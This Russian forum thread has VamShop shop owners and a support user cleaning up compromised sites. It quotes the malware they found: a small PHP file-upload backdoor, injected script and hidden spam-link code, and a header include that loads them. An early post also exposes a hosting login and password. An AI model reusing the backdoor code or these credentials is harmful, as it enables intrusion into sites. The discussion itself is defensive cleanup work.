дыры в движке

[karaush 0]

Здравствуйте, сегодня мне позвонили на мой мобильный телефон, который написан на моем сайте ledyone.ru . И сказали, что сайт очень уязвимый. Я не поверил. и мне предоставили отчет. он в прикрепленном файле.

Подскажите что мне делать?

ledyone.ru.doc

его сайт http://bp24.org

сайт Хостинга который предлагают http://vacuum-shop.ru:2082

| UserName: vacuumsh

| PassWord: v32f6ST?PpJ-

и еще его письмо

Полный перечень услуг по защите представлен на нашем сайте

http://bp24.org

Тариф 1300 руб\мес. при оплате на год. В стоимость входит:

- Зищита и предотвращение уязвимостей

- Размещение сайта на нашем хостинге с ежедневным анализом.

[support 447]

У Вас есть доступ к лог-файлам (access, error log)?!

Пришлите в личку доступ на ftp, ссылку на магазин, доступ в админку и ещё раз о проблеме.

Попробую посмотреть.

[support 447]

Удалил папку /admin/includes/javascript/tiny_mce/plugins/tinybrowser/

Это старый файл-менеджер, который использовался в старых версиях магазина.

В нём есть дырка.

Если у кого осталась эта папка, удалите, на всякий случай, что б лишних соблазнов не было.

Либо защитите паролем админку через .htaccess .htpasswd файлы, тогда можно и не удалять.

[h2lord 0]

Через пару дней, они бы вам через эту дыру залилибы вирус, чтобы думали быстрее.

А в апдейтах надо писать какие файлы надо удалить, иначе так и будут валялтся дырявые скрипты в новом магазине

[Алексей Павлов 0]

Вот у меня при открытии карточки товара вылезало окно, в котром предлагалось отправить смс на короткий номер. Открывалось только один раз. Вот последние строчки кода

</noscript>

<!-- /HotLog -->



</div>

<!-- /Низ -->

</div>

<!-- /Контейнер -->

</body></html><script src="admin/includes/javascript/json.js"></script>

[/CODE]


В каком фале прописано не пойму.

Сам скрипт удалил.

 

Еще в папке admin/includes обнаружил файл upkk.php  с таким кодом

[CODE]

<?php

if(isset($_FILES['upkk']['tmp_name'])){

  @mkdir("kk", 0777);

  copy($_FILES['upkk']['tmp_name'],"kk/".basename($_FILES['upkk']['name']));

}

?>

А вот это нормально?

<script type="text/javascript" src="jscript/jquery/jquery.js"></script>

<link rel="stylesheet" type="text/css" href="jscript/jquery/plugins/fancybox/jquery.fancybox-1.2.5.css" media="screen" />

<script type="text/javascript" src="jscript/jquery/plugins/fancybox/jquery.fancybox-1.2.5.pack.js"></script>

<script type="text/javascript">

$(document).ready(function() {

  $("a.zoom").fancybox({

   "zoomOpacity"   : true,

   "zoomSpeedIn"   : 500,

   "zoomSpeedOut"   : 500

  });

  $("a.iframe").fancybox({

   "padding" : 20, // отступ контента от краев окна

   "imageScale" : false, // Принимает значение true - контент(изображения) масштабируется по размеру окна, или false - окно вытягивается по размеру контента. По умолчанию - TRUE

   "zoomOpacity" : true, // изменение прозрачности контента во время анимации (по умолчанию false)

   "zoomSpeedIn" : 500, // скорость анимации в мс при увеличении фото (по умолчанию 0)

   "zoomSpeedOut" : 500, // скорость анимации в мс при уменьшении фото (по умолчанию 0)

   "zoomSpeedChange" : 500, // скорость анимации в мс при смене фото (по умолчанию 0)

   "frameWidth" : 1000,  // ширина окна, px (425px - по умолчанию)

   "frameHeight" : 700, // высота окна, px(355px - по умолчанию)

   "frameScale" : false, // Принимает значение true - контент(изображения) масштабируется по размеру окна, или false - окно вытягивается по размеру контента. По умолчанию - TRUE

   "overlayShow" : true, // если true затеняят страницу под всплывающим окном. (по умолчанию true). Цвет задается в jquery.fancybox.css - div#fancy_overlay

   "overlayOpacity" : 0.8,  // Прозрачность затенения  (0.3 по умолчанию)

   "hideOnContentClick" :true, // Если TRUE  закрывает окно по клику по любой его точке (кроме элементов навигации). Поумолчанию TRUE

   "centerOnScroll" : false // Если TRUE окно центрируется на экране, когда пользователь прокручивает страницу

  });


});

</script>

[/code]

Изменено 16 марта, 2012 пользователем NewAger

[support 447]

Последний код - нормально.

А остальное - нет.

Нужно искать, в каком файле у Вас кака сидит.

[Алексей Павлов 0]

А есть предположения, где она может находиться? Окно вылезет когда открываешь карточку товара

[support 447]

Так запустите поиск по файлам, это секундное дело, всё и найдётся.

Можнт в /index.php

Может в /includes/application_bottom.php, много где может быть.

[Алексей Павлов 0]

Прятался в /product_info.php

теперь нужно выяснить как смогли изменить код...

может через папку /admin/includes/javascript/tiny_mce/plugins/tinybrowser/ ?

[support 447]

Я выше писал, если у Вас есть эта папка - то да, могли через неё сломать.

Удалите её обязательно.

Это старый файл-менеджер, которго давно уже нет в VamShop, мог остаться только если Вы ставили патчи, а не с нуля новую версию VamShop.

[Алексей Павлов 0]

Ставил магазин в 2009 году

Сообщение про удаление папки видел, удалил, сменил пароли и явки, надеюсь не повторится ;)

[support 447]

Хорошо, что удалили.

[korvin1000 0]

После обновления до версии 1.67, при входе в админку грузится Exploit:CVE-2012-0507,A

Удалил папку /admin/includes/javascript/tiny_mce/plugins/tinybrowser/

Просим прислать полный список папок и файлов, что надо удалить от начальной версии или, хотя бы, от 2009 г. В том числе безопасных, но не нужных

[korvin1000 0]

и еще прислали письмо

Пришло сообщение.

По данным поиска Яндекса, на Вашем сайте famet.ru есть страницы, которые могут представлять угрозу для компьютеров посетителей. Поэтому в результатах поиска Яндекса ссылки на эти страницы помечаются как потенциально опасные.

Подробная информация о заражении Вашего сайта размещена на странице http://yandex.ru/inf...amet.ru&l10n=ru .

Причем от этой дыры все сайты заразились, в том числе оскоммерс. В магазины никто не заходит, т.к яндекс предупреждает.

Восстановил сайты до обновления. Что делать с обновлением? Загружать страшно.

[support 447]

Так Вы перед обновлением файлы заражённые почистили?!

[korvin1000 0]

Это случилось после обновления

[support 447]

Я так понял Вы на email прислали информацию.

Попробую посмотреть.

Но дело вряд ли в новой версии, в новой версии нет дырок, насколько мне известно.

В-общем, как разберусь, напишу.

[h2lord 0]

Еще в папке admin/includes обнаружил файл upkk.php с таким кодом

<?php

if(isset($_FILES['upkk']['tmp_name'])){

  @mkdir("kk", 0777);

  copy($_FILES['upkk']['tmp_name'],"kk/".basename($_FILES['upkk']['name']));

}

?>

[/CODE]

 


 

ищите тамже kk.php в нем вебшел

[Алексей Павлов 0]

Больше других нет. Видимо у всех по-разному этот файл называется.

[Алексей Павлов 0]

Опять проблема нарисовалась.

Вот такой код обнаружил на главной странице сайта

</head>

<body>

<div style="position:absolute;left:-2000px;width:2000px"><div style="position:absolute;left:-2000px;width:2000px"><a href="http://www.taxteam.co.il/%D7%A7%D7%91%D7%9C_%D7%94%D7%A6%D7%A2%D7%95%D7%AA_%D7%9E%D7%A8%D7%95%D7%90%D7%94_%D7%97%D7%A9%D7%91%D7%95%D7%9F" target="_blank">רואה חשבון</a><a href="http://www.mega-porno.ru/" target="_blank">порно</a>  барон<a href="http://s-holidays.ru" target="_blank">шоу-номера на свадьбу</a><a href="http://www.cars-israel.com/" target="_blank">מכירת רכב</a><a href="http://y-c.co.il/" target="_blank">וילון</a><a href="http://www.asaforon.co.il/" target="_blank">עורך דין תעבורה</a><a href="http://www.bigsexshok.ru/erotic.php" target="_blank">Бесплатная эротика это неотъемлемая часть всей сети Интернет</a> .<a href="http://lusel.net" target="_blank">Красивая эротика</a>  как удивление пьяное знойное.Самое страстное.  <a href="http://vipdevki.net" target="_blank">бесплатная эротика сборка</a> .</div></div>

<script type="text/javascript">

[/CODE]

Не могу найти, где находится.

При этом слил магазин на комп и нортон сразу нашел  public_html\admin\images\graphs\icon_load.php

Угроза: PHP.Backdoor.Trojan

Файл удалил, а вот код найти не могу где убирать

[Алексей Павлов 0]

Нашел

includes/header.php

</head>

<body>

<?

echo"<div style=\"position:absolute;left:-2000px;width:2000px\">";

include ($_SERVER['DOCUMENT_ROOT'].'/images/img.php');

echo __banner();

echo"</div>";

?>

[/CODE]

/images/img.php удалять?

[-Inna- 0]

может быть проще удалить все файлы сохранив папку имагес

и базу данных.

залить новый дистрибутив наверняка зная что он чистый

[Алексей Павлов 0]

может быть. просто есть много правленных файлов, потом сложно будет вспомнить, что я подправлял.

[support 447]

Конечно удалять и этот код и img.php

[Алексей Павлов 0]

Все удалил, код страницы с виду чистый, но при открытии сайта с телефона получаю картинку с предложением обновить браузер. Никто не сталкивался такой проблемой?